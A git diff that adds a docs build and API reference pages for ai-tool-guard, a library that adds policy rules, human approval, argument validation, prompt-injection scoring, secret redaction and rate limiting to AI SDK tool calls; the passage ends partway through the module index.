diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 609d1d0..0065e37 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -25,3 +25,14 @@ jobs: - run: npm run lint - run: npm test - run: npm run build + + docs: + name: Documentation Build + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: actions/setup-python@v5 + with: + python-version: "3.12" + - run: pip install -r docs/requirements.txt + - run: mkdocs build --strict diff --git a/.gitignore b/.gitignore index bf0eeed..e4f8cea 100644 --- a/.gitignore +++ b/.gitignore @@ -4,3 +4,4 @@ dist/ .env .env.* coverage/ +site/ diff --git a/.readthedocs.yaml b/.readthedocs.yaml new file mode 100644 index 0000000..77af0b8 --- /dev/null +++ b/.readthedocs.yaml @@ -0,0 +1,13 @@ +version: 2 + +build: + os: ubuntu-24.04 + tools: + python: "3.12" + +mkdocs: + configuration: mkdocs.yml + +python: + install: + - requirements: docs/requirements.txt diff --git a/README.md b/README.md index 87d76e5..bfe63ea 100644 --- a/README.md +++ b/README.md @@ -58,27 +58,27 @@ const result = await generateText({ ## Features -| Feature | Description | Requirement | -|---------|-------------|-------------| -| **Policy engine** | Rule-based allow/deny/require-approval with glob patterns, risk levels, priorities, and async conditions | #1 | -| **External policy backends** | Adapter interface for OPA/Rego, Cedar, or custom ABAC engines | #1 | -| **Decision records** | Structured audit output for every evaluation (matched rules, risk category, attributes, redactions) | #2 | -| **Dry-run / simulation** | Evaluate policies across recorded traces without executing tools | #3 | -| **Conversation-aware policies** | Policies can incorporate session risk score, prior failures, recent approvals | #4 | -| **Approve with edits** | Approval handler can patch arguments before execution | #5 | -| **Approval correlation** | Payload-hash tokens with TTL prevent mismatch between request and resolution | #6 | -| **Argument guards** | Zod schemas, allowlists, denylists, regex, PII scanning per field | #8 | -| **Injection detection** | Heuristic prompt-injection detector that can deny or downgrade to approval | #9 | -| **Output filtering** | Secrets stripping, PII redaction, custom filters on tool results | #10 | -| **Rate limiting** | Sliding-window rate limits + concurrency caps with reject or queue backpressure | #11 | -| **OpenTelemetry** | Opinionated spans for policy eval, approval wait, tool execution, redaction | #12 | -| **MCP drift detection** | SHA-256 schema fingerprinting, drift detection, actionable remediation | #15 | +| Feature | Description | +|---------|-------------| +| **Policy engine** | Rule-based allow/deny/require-approval with glob patterns, risk levels, priorities, and async conditions | +| **External policy backends** | Adapter interface for OPA/Rego, Cedar, or custom ABAC engines | +| **Decision records** | Structured audit output for every evaluation (matched rules, risk category, attributes, redactions) | +| **Dry-run / simulation** | Evaluate policies across recorded traces without executing tools | +| **Conversation-aware policies** | Policies can incorporate session risk score, prior failures, recent approvals | +| **Approve with edits** | Approval handler can patch arguments before execution | +| **Approval correlation** | Payload-hash tokens with TTL prevent mismatch between request and resolution | +| **Argument guards** | Zod schemas, allowlists, denylists, regex, PII scanning per field | +| **Injection detection** | Heuristic prompt-injection detector that can deny or downgrade to approval | +| **Output filtering** | Secrets stripping, PII redaction, custom filters on tool results | +| **Rate limiting** | Sliding-window rate limits + concurrency caps with reject or queue backpressure | +| **OpenTelemetry** | Opinionated spans for policy eval, approval wait, tool execution, redaction | +| **MCP drift detection** | SHA-256 schema fingerprinting, drift detection, actionable remediation | ## Architecture ``` ┌─────────────────────────────────────────┐ - │ createToolGuard(options) │ + │ createToolGuard(options) │ └──────────────┬──────────────────────────┘ │ ┌──────────────────────┼──────────────────────┐ @@ -90,7 +90,7 @@ const result = await generateText({ ┌─── Execution Pipeline ───┐ │ │ │ │ │ 1. Injection detection │ ┌──────────┴─────┐ - │ 2. Argument validation │ │ PolicyBackend │ + │ 2. Argument validation │ │ PolicyBackend │ │ 3. Policy evaluation ◄──┼─────┤ (OPA, Cedar) │ │ 4. Approval flow │ └────────────────┘ │ 5. Rate limiting │ @@ -565,14 +565,14 @@ try { } catch (err) { if (err instanceof ToolGuardError) { switch (err.code) { - case "policy-denied": // Policy rule blocked the call - case "approval-denied": // Human denied approval - case "no-approval-handler": // Approval required but no handler set + case "policy-denied": // Policy rule blocked the call + case "approval-denied": // Human denied approval + case "no-approval-handler": // Approval required but no handler set case "arg-validation-failed": // Argument guard failed - case "injection-detected": // Prompt injection suspected - case "rate-limited": // Rate limit exceeded - case "output-blocked": // Output filter blocked the result - case "mcp-drift": // MCP schema drift detected + case "injection-detected": // Prompt injection suspected + case "rate-limited": // Rate limit exceeded + case "output-blocked": // Output filter blocked the result + case "mcp-drift": // MCP schema drift detected } console.log(err.toolName); // Which tool console.log(err.decision); // Full DecisionRecord (if available) diff --git a/docs/api/approval.md b/docs/api/approval.md new file mode 100644 index 0000000..58732dd --- /dev/null +++ b/docs/api/approval.md @@ -0,0 +1,156 @@ +# Approval — `ai-tool-guard/approval` + +The approval module manages the lifecycle of human-in-the-loop approval requests. +It creates correlation tokens, enforces TTL expiry, supports argument patching +("approve with edits"), and delegates the actual approval decision to a +caller-supplied handler. + +```ts +import { ApprovalManager } from "ai-tool-guard/approval"; +import type { ApprovalFlowResult } from "ai-tool-guard/approval"; +``` + +The related types `ApprovalToken`, `ApprovalResolution`, and `ApprovalHandler` are +defined in `ai-tool-guard/types` and re-exported from the root path. + +```ts +import type { + ApprovalToken, + ApprovalResolution, + ApprovalHandler, +} from "ai-tool-guard"; +``` + +--- + +## Classes + +### `ApprovalManager` + +Manages the full lifecycle of approval tokens: creation, handler invocation, TTL +enforcement, and resolution. + +#### Constructor + +```ts +new ApprovalManager(handler: ApprovalHandler, defaultTtlMs?: number) +``` + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `handler` | `ApprovalHandler` | Yes | Async callback invoked with the approval token; must return an `ApprovalResolution` | +| `defaultTtlMs` | `number` | No | Token time-to-live in milliseconds. Default: `300000` (5 minutes) | + +#### Methods + +##### `requestApproval` + +```ts +async requestApproval(ctx: PolicyContext): Promise +``` + +Create an approval token for a tool call and invoke the handler. The token +includes a SHA-256 hash of the call payload for correlation. Tokens are +automatically removed from the pending set after the handler resolves. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `ctx` | `PolicyContext` | Yes | Policy context of the tool call requiring approval | + +**Returns** `Promise` + +The result indicates whether the call was approved, the final arguments to use +(original or patched), and optional metadata from the approver. + +##### `getPendingTokens` + +```ts +getPendingTokens(): ReadonlyArray +``` + +Return a read-only snapshot of currently pending approval tokens. Useful for +rendering an approval UI. + +**Returns** `ReadonlyArray` + +--- + +## Interfaces + +### `ApprovalFlowResult` + +The complete result of a single approval flow cycle returned by +`requestApproval()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `approved` | `boolean` | Yes | Whether the tool call was approved | +| `tokenId` | `string` | Yes | The approval token ID for correlation and auditing | +| `args` | `Record` | Yes | The final arguments to pass to the tool (original or patched by the approver) | +| `patchedFields` | `string[]` | No | Names of argument fields that were modified by the approver | +| `approvedBy` | `string` | No | Identity of the approver, if provided by the handler | +| `reason` | `string` | No | Human-readable reason for denial, if the call was not approved | +| `error` | `string` | No | Error message if the approval flow itself failed (e.g., token not found or expired) | + +--- + +## Types (from `ai-tool-guard`) + +### `ApprovalToken` + +Correlation token sent to the `ApprovalHandler`. Contains a snapshot of the +original arguments and a payload hash for tamper detection. + +| Field | Type | Required | Description | +|---|---|---|---| +| `id` | `string` | Yes | Randomly generated unique token ID | +| `payloadHash` | `string` | Yes | SHA-256 hash of the canonical `{ toolName, args }` payload | +| `toolName` | `string` | Yes | Name of the tool awaiting approval | +| `originalArgs` | `Record` | Yes | Snapshot of the tool arguments at request time | +| `createdAt` | `string` | Yes | ISO-8601 timestamp of token creation | +| `ttlMs` | `number` | No | Token time-to-live in milliseconds | + +--- + +### `ApprovalResolution` + +The response returned by the `ApprovalHandler` callback. + +| Field | Type | Required | Description | +|---|---|---|---| +| `approved` | `boolean` | Yes | Whether the tool call is approved | +| `patchedArgs` | `Record` | No | Partial argument overrides; merged with `originalArgs` when provided | +| `approvedBy` | `string` | No | Identity of the approver for audit purposes | +| `reason` | `string` | No | Reason for denial when `approved` is `false` | + +--- + +### `ApprovalHandler` + +```ts +type ApprovalHandler = (token: ApprovalToken) => Promise; +``` + +Callback type the consumer implements to handle approval requests. The handler +receives the token, presents it to a human approver (or automated system), and +resolves with the decision. + +**Example** + +```ts +const handler: ApprovalHandler = async (token) => { + const decision = await showApprovalModal({ + toolName: token.toolName, + args: token.originalArgs, + }); + + return { + approved: decision.confirmed, + approvedBy: decision.userId, + patchedArgs: decision.edits, + reason: decision.reason, + }; +}; + +const guard = createToolGuard({ onApprovalRequired: handler }); +``` diff --git a/docs/api/core.md b/docs/api/core.md new file mode 100644 index 0000000..2b48b69 --- /dev/null +++ b/docs/api/core.md @@ -0,0 +1,280 @@ +# Core — `ai-tool-guard` + +The root import path is the primary integration point. It provides the guard +factory, the `ToolGuard` class, and the error type, together with re-exports of +every type defined in the library. + +```ts +import { createToolGuard, ToolGuard, ToolGuardError } from "ai-tool-guard"; +``` + +--- + +## Functions + +### `createToolGuard` + +```ts +function createToolGuard(options?: GuardOptions): ToolGuard +``` + +Create a `ToolGuard` instance. This is the recommended entry point. + +**Parameters** + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `options` | `GuardOptions` | No | Guard configuration. Defaults to an empty object (allow-all mode). | + +**Returns** `ToolGuard` + +**Example** + +```ts +const guard = createToolGuard({ + rules: [deny({ tools: "dangerousTool" })], + onApprovalRequired: async (token) => showModal(token), + otel: { enabled: true }, +}); +``` + +--- + +## Classes + +### `ToolGuard` + +Wraps Vercel AI SDK tools with policy enforcement, argument validation, approval +flows, rate limiting, output filtering, and telemetry. + +#### Constructor + +```ts +new ToolGuard(options: GuardOptions) +``` + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `options` | `GuardOptions` | Yes | Configuration for this guard instance | + +#### Methods + +##### `guardTool` + +```ts +guardTool, TResult>( + name: string, + tool: AiSdkTool, + config?: ToolGuardConfig, +): AiSdkTool +``` + +Wrap a single AI SDK tool with guard enforcement. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `name` | `string` | Yes | Tool name used in policy evaluation and error messages | +| `tool` | `AiSdkTool` | Yes | The original AI SDK tool object | +| `config` | `ToolGuardConfig` | No | Per-tool metadata: risk level, guards, rate limits, filters | + +**Returns** `AiSdkTool` — the wrapped tool, compatible with `generateText({ tools })`. + +If the tool has no `execute` function (e.g., a client-side tool), it is returned unchanged. + +##### `guardTools` + +```ts +guardTools>( + toolMap: T, +): { [K in keyof T]: AiSdkTool } +``` + +Wrap multiple tools at once. Accepts a map of `{ toolName: { tool, ...config } }` +and returns a flat `{ toolName: guardedTool }` map. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `toolMap` | `T extends Record` | Yes | Map of tool names to tool + config entries | + +**Returns** `{ [K in keyof T]: AiSdkTool }` — a map of guarded tools. + +**Example** + +```ts +const tools = guard.guardTools({ + readFile: { tool: readFileTool, riskLevel: "low" }, + writeFile: { tool: writeFileTool, riskLevel: "high" }, + deleteFile: { tool: deleteFileTool, riskLevel: "critical" }, +}); + +const result = await generateText({ model, tools, prompt }); +``` + +--- + +### `ToolGuardError` + +Thrown by `ToolGuard` when a tool call is rejected at any stage of the pipeline. + +#### Constructor + +```ts +new ToolGuardError( + message: string, + code: ToolGuardErrorCode, + toolName: string, + decision?: DecisionRecord, +) +``` + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `message` | `string` | Yes | Human-readable error description | +| `code` | `ToolGuardErrorCode` | Yes | Machine-readable error code | +| `toolName` | `string` | Yes | Name of the tool that was blocked | +| `decision` | `DecisionRecord` | No | The policy decision record, if available | + +#### Properties + +| Property | Type | Description | +|---|---|---| +| `name` | `string` | Always `"ToolGuardError"` | +| `code` | `ToolGuardErrorCode` | Machine-readable code indicating the rejection reason | +| `toolName` | `string` | Name of the tool that was blocked | +| `decision` | `DecisionRecord \| undefined` | Policy decision record for the rejection, if applicable | + +**Example** + +```ts +try { + await generateText({ model, tools, prompt }); +} catch (err) { + if (err instanceof ToolGuardError) { + console.error(err.code, err.toolName, err.decision?.reason); + } +} +``` + +--- + +## Types + +### `ToolGuardErrorCode` + +```ts +type ToolGuardErrorCode = + | "policy-denied" + | "approval-denied" + | "no-approval-handler" + | "arg-validation-failed" + | "injection-detected" + | "rate-limited" + | "output-blocked" + | "mcp-drift"; +``` + +| Code | When thrown | +|---|---| +| `"policy-denied"` | A policy rule or backend returned `"deny"` | +| `"approval-denied"` | The approval handler rejected the request | +| `"no-approval-handler"` | Approval required but no `onApprovalRequired` handler configured | +| `"arg-validation-failed"` | One or more argument guards failed | +| `"injection-detected"` | Injection score exceeded threshold and action is `"deny"` | +| `"rate-limited"` | The tool exceeded its rate or concurrency limit | +| `"output-blocked"` | An output filter returned verdict `"block"` | +| `"mcp-drift"` | Tool schema differs from its pinned fingerprint | + +--- + +## Interfaces + +### `GuardOptions` + +Top-level configuration object passed to `createToolGuard()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `rules` | `PolicyRule[]` | No | Built-in policy rules evaluated against every tool call | +| `backend` | `PolicyBackend` | No | External policy backend (OPA, Cedar, custom); evaluated before built-in rules | +| `defaultRiskLevel` | `RiskLevel` | No | Fallback risk level for tools without explicit config. Default: `"low"` | +| `onApprovalRequired` | `ApprovalHandler` | No | Callback invoked when a tool requires human approval | +| `injectionDetection` | `InjectionDetectorConfig` | No | Global injection detection settings | +| `defaultRateLimit` | `RateLimitConfig` | No | Default rate limit applied to all tools | +| `defaultMaxConcurrency` | `number` | No | Default concurrency cap applied to all tools | +| `otel` | `OtelConfig` | No | OpenTelemetry tracing configuration | +| `dryRun` | `boolean` | No | When `true`, policy is evaluated but tools are not executed | +| `onDecision` | `(record: DecisionRecord) => void \| Promise` | No | Callback fired for every policy decision (allow, deny, or approval) | +| `resolveUserAttributes` | `() => Record \| Promise>` | No | Resolver called per invocation to supply user attributes for policy context | +| `resolveConversationContext` | `() => ConversationContext \| Promise` | No | Resolver called per invocation to supply conversation metadata | + +--- + +### `ToolGuardConfig` + +Per-tool metadata attached via `guardTool()` or the `guardTools()` input map. + +| Field | Type | Required | Description | +|---|---|---|---| +| `riskLevel` | `RiskLevel` | No | Risk level of this tool (`"low"` \| `"medium"` \| `"high"` \| `"critical"`) | +| `riskCategories` | `RiskCategory[]` | No | Classification tags for audit and explainability | +| `rateLimit` | `RateLimitConfig` | No | Per-tool rate limit (overrides `defaultRateLimit`) | +| `maxConcurrency` | `number` | No | Per-tool concurrency cap (overrides `defaultMaxConcurrency`) | +| `argGuards` | `ArgGuard[]` | No | Argument-level validators run before policy evaluation | +| `outputFilters` | `OutputFilter[]` | No | Output filters applied after tool execution | +| `requireApproval` | `boolean` | No | Force approval regardless of policy verdict | +| `mcpFingerprint` | `string` | No | Expected schema hash; execution is blocked on mismatch | + +--- + +### `AiSdkTool` + +Minimal structural interface matching the Vercel AI SDK `tool()` return shape. +The library depends on this structural type rather than importing from `ai` +directly, so it works across AI SDK versions. + +```ts +interface AiSdkTool, TResult = unknown> { + description?: string; + parameters: unknown; // Zod schema + execute?: (args: TArgs, options: ToolExecuteOptions) => Promise; + [key: string]: unknown; +} +``` + +| Field | Type | Required | Description | +|---|---|---|---| +| `description` | `string` | No | Human-readable tool description | +| `parameters` | `unknown` | Yes | Zod schema describing the tool's arguments | +| `execute` | `(args: TArgs, options: ToolExecuteOptions) => Promise` | No | Tool implementation; absent for client-side tools | + +--- + +### `ToolExecuteOptions` + +Options forwarded to a tool's `execute` function by the AI SDK runtime. + +| Field | Type | Required | Description | +|---|---|---|---| +| `toolCallId` | `string` | Yes | Unique identifier for this tool call invocation | +| `messages` | `unknown[]` | No | Conversation message history | +| `abortSignal` | `AbortSignal` | No | Signal to abort the tool call | + +Additional keys are permitted (index signature `[key: string]: unknown`). + +--- + +### `ToolWithConfig` + +Input entry shape for `guardTools()`. Extends `ToolGuardConfig` with a required +`tool` field. + +```ts +interface ToolWithConfig extends ToolGuardConfig { + tool: AiSdkTool; +} +``` + +| Field | Type | Required | Description | +|---|---|---|---| +| `tool` | `AiSdkTool` | Yes | The original AI SDK tool to wrap | +| *(all `ToolGuardConfig` fields)* | — | No | Guard configuration for this tool | diff --git a/docs/api/guards.md b/docs/api/guards.md new file mode 100644 index 0000000..8dfab49 --- /dev/null +++ b/docs/api/guards.md @@ -0,0 +1,430 @@ +# Guards — `ai-tool-guard/guards` + +The guards module provides four categories of runtime protection: argument-level +validation, prompt injection detection, output egress filtering, and rate limiting +with concurrency control. + +```ts +import { + zodGuard, + allowlist, + denylist, + regexGuard, + piiGuard, + evaluateArgGuards, + checkInjection, + secretsFilter, + piiOutputFilter, + customFilter, + runOutputFilters, + RateLimiter, +} from "ai-tool-guard/guards"; +``` + +--- + +## Argument Guards + +Argument guards run before policy evaluation and reject calls whose arguments +fail validation. + +### `zodGuard` + +```ts +function zodGuard(config: ZodArgGuard): ArgGuard +``` + +Create an `ArgGuard` backed by a Zod schema. The field value is parsed with +`schema.safeParse()`; any Zod issues are joined and returned as the failure +message. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `config.field` | `string` | Yes | Dot-path to the argument field (e.g. `"user.email"`) or `"*"` for the whole args object | +| `config.schema` | `z.ZodType` | Yes | Zod schema to validate the field value against | + +**Returns** `ArgGuard` + +**Example** + +```ts +import { z } from "zod"; + +const guard = zodGuard({ + field: "query", + schema: z.string().min(1).max(500), +}); +``` + +--- + +### `allowlist` + +```ts +function allowlist(field: string, allowed: readonly unknown[]): ArgGuard +``` + +Create an `ArgGuard` that rejects any value not present in the allowed list. +Comparison uses `Array.prototype.includes` (strict equality). + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `field` | `string` | Yes | Argument field to check | +| `allowed` | `readonly unknown[]` | Yes | Set of permitted values | + +**Returns** `ArgGuard` + +--- + +### `denylist` + +```ts +function denylist(field: string, denied: readonly unknown[]): ArgGuard +``` + +Create an `ArgGuard` that rejects any value present in the denied list. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `field` | `string` | Yes | Argument field to check | +| `denied` | `readonly unknown[]` | Yes | Set of forbidden values | + +**Returns** `ArgGuard` + +--- + +### `regexGuard` + +```ts +function regexGuard( + field: string, + pattern: RegExp, + opts?: { mustMatch?: boolean; message?: string }, +): ArgGuard +``` + +Create an `ArgGuard` that validates a string field against a regular expression. +Non-string values always fail. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `field` | `string` | Yes | Argument field to test | +| `pattern` | `RegExp` | Yes | Pattern to test against | +| `opts.mustMatch` | `boolean` | No | When `true`, the value must match. When `false`, matching is forbidden. Default: `true` | +| `opts.message` | `string` | No | Custom failure message | + +**Returns** `ArgGuard` + +--- + +### `piiGuard` + +```ts +function piiGuard( + field: string, + opts?: { allowedTypes?: string[] }, +): ArgGuard +``` + +Create an `ArgGuard` that scans a string field for common PII patterns. Detected +patterns are `"email"`, `"ssn"`, `"credit-card"`, `"phone-us"`, and +`"ip-address"`. Credit card numbers are additionally validated with a Luhn check. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `field` | `string` | Yes | Argument field to scan | +| `opts.allowedTypes` | `string[]` | No | PII type names to skip (e.g. `["email"]` to allow email addresses) | + +**Returns** `ArgGuard` + +--- + +### `evaluateArgGuards` + +```ts +async function evaluateArgGuards( + guards: ArgGuard[], + ctx: PolicyContext, +): Promise +``` + +Run all argument guards against the tool call context. Guards are evaluated in +order; all guards run even if earlier ones fail, collecting all violations. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `guards` | `ArgGuard[]` | Yes | Guards to evaluate | +| `ctx` | `PolicyContext` | Yes | Tool call context providing `args` and other metadata | + +**Returns** `Promise` + +--- + +## Injection Detection + +### `checkInjection` + +```ts +async function checkInjection( + ctx: PolicyContext, + config: InjectionDetectorConfig, +): Promise +``` + +Scan tool arguments for prompt injection patterns using either a built-in +heuristic detector or a custom scoring function. + +The built-in detector flattens all string values in `args` into a single text +blob and checks against patterns including instruction overrides, role hijacking, +delimiter injection, exfiltration attempts, and encoded payloads. It also flags +arguments with total string length exceeding 5,000 characters. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `ctx` | `PolicyContext` | Yes | Tool call context | +| `config` | `InjectionDetectorConfig` | Yes | Detection configuration | + +**Returns** `Promise` + +--- + +## Output Filters + +Output filters run after tool execution and can redact or block the result before +it reaches the model. + +### `secretsFilter` + +```ts +function secretsFilter(extraRules?: RedactionRule[]): OutputFilter +``` + +Create an output filter that redacts common secrets from string output using +regex-based replacement. Built-in patterns cover AWS access keys, GitHub tokens, +JWTs, generic API keys, Bearer tokens, and PEM private keys. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `extraRules` | `RedactionRule[]` | No | Additional redaction rules appended to the built-in set | + +**Returns** `OutputFilter` + +--- + +### `piiOutputFilter` + +```ts +function piiOutputFilter(opts?: { allowedTypes?: string[] }): OutputFilter +``` + +Create an output filter that redacts PII from string output. Covers email +addresses, SSNs, US phone numbers, and credit card numbers (Luhn-validated). + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `opts.allowedTypes` | `string[]` | No | PII type names to skip: `"email"`, `"ssn"`, `"phone"`, `"credit-card"` | + +**Returns** `OutputFilter` + +--- + +### `customFilter` + +```ts +function customFilter( + name: string, + fn: (result: unknown, ctx: PolicyContext) => Promise, +): OutputFilter +``` + +Wrap an arbitrary async function as an `OutputFilter`. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `name` | `string` | Yes | Identifier used in logging and `OutputFilterChainResult.blockedBy` | +| `fn` | `(result: unknown, ctx: PolicyContext) => Promise` | Yes | Filter implementation | + +**Returns** `OutputFilter` + +**Example** + +```ts +const classificationFilter = customFilter("classification", async (result, ctx) => { + const sensitive = await detectSensitiveData(result); + if (sensitive) { + return { verdict: "block", output: null }; + } + return { verdict: "pass", output: result }; +}); +``` + +--- + +### `runOutputFilters` + +```ts +async function runOutputFilters( + filters: OutputFilter[], + result: unknown, + ctx: PolicyContext, +): Promise +``` + +Execute a chain of output filters sequentially. Each filter receives the output +of the previous filter. If any filter returns verdict `"block"`, the chain stops +immediately and the result is suppressed. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `filters` | `OutputFilter[]` | Yes | Ordered list of filters to run | +| `result` | `unknown` | Yes | Raw tool output | +| `ctx` | `PolicyContext` | Yes | Tool call context forwarded to each filter | + +**Returns** `Promise` + +--- + +## Rate Limiting + +### `RateLimiter` + +Sliding-window rate limiter with per-tool state and optional concurrency control. +Supports two backpressure strategies: `"reject"` (return immediately with an +error) and `"queue"` (wait until a slot becomes available). + +#### Constructor + +```ts +new RateLimiter() +``` + +No constructor parameters. State is maintained internally per tool name. + +#### Methods + +##### `acquire` + +```ts +async acquire( + toolName: string, + config: RateLimitConfig, + maxConcurrency?: number, +): Promise +``` + +Attempt to acquire a rate limit slot for the given tool. + +- Slides the window by discarding timestamps older than `config.windowMs`. +- Checks call count against `config.maxCalls`. +- Checks active calls against `maxConcurrency` if provided. +- When `config.strategy === "queue"`, blocks until a slot is available instead + of returning `allowed: false`. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Tool identifier | +| `config` | `RateLimitConfig` | Yes | Rate limit settings | +| `maxConcurrency` | `number` | No | Maximum simultaneous active calls | + +**Returns** `Promise` + +##### `release` + +```ts +release(toolName: string): void +``` + +Decrement the active call counter after tool execution completes. Also wakes one +queued caller if any are waiting. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Tool identifier | + +##### `getState` + +```ts +getState(toolName: string): RateLimitState | undefined +``` + +Return a reference to the current sliding-window state for a tool. Returns +`undefined` if the tool has not yet been seen. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Tool identifier | + +**Returns** `RateLimitState | undefined` + +##### `reset` + +```ts +reset(): void +``` + +Clear all rate limit state and reject any queued waiters with an error. Intended +for testing. + +--- + +## Result Types + +### `ArgGuardResult` + +Returned by `evaluateArgGuards()`. + +| Field | Type | Description | +|---|---|---| +| `passed` | `boolean` | `true` when all guards passed (no violations) | +| `violations` | `Array<{ field: string; message: string }>` | List of validation failures with field path and reason | + +--- + +### `InjectionCheckResult` + +Returned by `checkInjection()`. + +| Field | Type | Description | +|---|---|---| +| `score` | `number` | Suspicion score from 0 to 1 | +| `suspected` | `boolean` | `true` when `score >= config.threshold` | +| `action` | `"downgrade" \| "deny" \| "log"` | The configured action at detection time | +| `verdictOverride` | `DecisionVerdict` | How the policy verdict should be modified; `undefined` if no override | + +--- + +### `RedactionRule` + +Pattern-based redaction rule used by `secretsFilter()` and `piiOutputFilter()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `name` | `string` | Yes | Human-readable identifier for logging | +| `pattern` | `RegExp` | Yes | Regex to match sensitive content (should use the `g` flag for replacement) | +| `replacement` | `string` | No | Replacement string. Default: `"[REDACTED]"` | +| `validate` | `(match: string) => boolean` | No | Optional post-match validator; return `true` to confirm the match is real (used for Luhn checks) | + +--- + +### `OutputFilterChainResult` + +Returned by `runOutputFilters()`. + +| Field | Type | Description | +|---|---|---| +| `output` | `unknown` | The final (possibly filtered) tool output | +| `redactedFields` | `string[]` | All fields redacted across all filters, prefixed with the filter name (e.g. `"secrets-filter:aws-key"`) | +| `blocked` | `boolean` | `true` when a filter returned verdict `"block"` | +| `blockedBy` | `string` | Name of the filter that blocked the output; only present when `blocked` is `true` | + +--- + +### `RateLimitAcquireResult` + +Returned by `RateLimiter.acquire()`. + +| Field | Type | Description | +|---|---|---| +| `allowed` | `boolean` | Whether the call is permitted to proceed | +| `reason` | `string` | Human-readable reason for rejection; only present when `allowed` is `false` | +| `retryAfterMs` | `number` | Milliseconds until the oldest window entry expires; only present on rate limit (not concurrency) rejection | diff --git a/docs/api/index.md b/docs/api/index.md new file mode 100644 index 0000000..fb40b01 --- /dev/null +++ b/docs/api/index.md @@ -0,0 +1,128 @@ +# API Reference + +This reference documents every public export from `ai-tool-guard`. The library is +distributed as a single npm package with six import paths, each focused on a +distinct concern. + +## Module map + +| Import path | Purpose | +|---|---| +| `ai-tool-guard` | Core guard factory, `ToolGuard` class, error types, and all re-exports | +| `ai-tool-guard/policy` | Policy rule builders, preset bundles, engine, and simulation | +| `ai-tool-guard/approval` | Approval lifecycle manager | +| `ai-tool-guard/guards` | Argument guards, injection detection, output filters, rate limiter | +| `ai-tool-guard/otel` | OpenTelemetry span helpers and semantic attribute constants | +| `ai-tool-guard/mcp` | MCP tool fingerprinting and drift detection | + +All six paths are also re-exported from the root `ai-tool-guard` path, so you can +import everything from one place if you prefer: + +```ts +import { createToolGuard, allow, deny, secretsFilter, ATTR } from "ai-tool-guard"; +``` + +--- + +## Quick reference + +### Core (`ai-tool-guard`) + +| Export | Kind | Description | +|---|---|---| +| `createToolGuard` | function | Create a `ToolGuard` instance from options | +| `ToolGuard` | class | Wraps AI SDK tools with policy enforcement | +| `ToolGuardError` | class | Error thrown when a guard rejects a tool call | +| `ToolGuardErrorCode` | type | Union of 8 error code strings | +| `GuardOptions` | interface | Top-level configuration object | +| `ToolGuardConfig` | interface | Per-tool configuration metadata | +| `AiSdkTool` | interface | Minimal Vercel AI SDK tool shape | +| `ToolExecuteOptions` | interface | Options forwarded to the tool's execute function | +| `ToolWithConfig` | interface | `guardTools()` input entry: tool plus guard config | + +### Policy (`ai-tool-guard/policy`) + +| Export | Kind | Description | +|---|---|---| +| `evaluatePolicy` | function | Evaluate a tool call against rules and/or backend | +| `allow` | function | Build a rule that allows matching tools | +| `deny` | function | Build a rule that denies matching tools | +| `requireApproval` | function | Build a rule that requires approval | +| `defaultPolicy` | function | Preset: low=allow, medium=approval, high/critical=deny | +| `readOnlyPolicy` | function | Preset: allow listed patterns, deny everything else | +| `simulate` | function | Dry-run evaluation across a recorded trace | +| `PolicyRule` | interface | Atomic policy rule definition | +| `PolicyBackend` | interface | Adapter for external engines (OPA, Cedar) | +| `PolicyBackendResult` | interface | Result returned by a `PolicyBackend` | +| `PolicyContext` | interface | Context passed to every policy evaluation | +| `RecordedToolCall` | interface | A captured tool call for simulation | +| `SimulationResult` | interface | Aggregate result of a simulation run | + +### Approval (`ai-tool-guard/approval`) + +| Export | Kind | Description | +|---|---|---| +| `ApprovalManager` | class | Manages token lifecycle and handler invocation | +| `ApprovalFlowResult` | interface | Result of a full approval cycle | +| `ApprovalToken` | interface | Correlation token sent to the approval handler | +| `ApprovalResolution` | interface | Handler response (approved/denied/patched) | +| `ApprovalHandler` | type | Callback type for approval handlers | + +### Guards (`ai-tool-guard/guards`) + +| Export | Kind | Description | +|---|---|---| +| `zodGuard` | function | Create an `ArgGuard` from a Zod schema | +| `allowlist` | function | Field must equal one of the allowed values | +| `denylist` | function | Field must not equal any denied value | +| `regexGuard` | function | Field must (or must not) match a regex | +| `piiGuard` | function | Detect PII patterns in a string field | +| `evaluateArgGuards` | function | Run all argument guards for a tool call | +| `checkInjection` | function | Heuristic prompt injection scan | +| `secretsFilter` | function | Output filter that redacts common secrets | +| `piiOutputFilter` | function | Output filter that redacts PII | +| `customFilter` | function | Wrap a function as an `OutputFilter` | +| `runOutputFilters` | function | Execute a chain of output filters | +| `RateLimiter` | class | Sliding-window rate limiter with concurrency control | +| `ArgGuardResult` | interface | Result of running argument guards | +| `InjectionCheckResult` | interface | Injection scan outcome | +| `RedactionRule` | interface | Pattern-based redaction rule definition | +| `OutputFilterChainResult` | interface | Aggregate result of running a filter chain | +| `RateLimitAcquireResult` | interface | Outcome of a rate limit acquire attempt | + +### OpenTelemetry (`ai-tool-guard/otel`) + +| Export | Kind | Description | +|---|---|---| +| `createTracer` | function | Obtain a tracer (real OTel or no-op fallback) | +| `spanFromDecision` | function | Create a policy-evaluation span from a `DecisionRecord` | +| 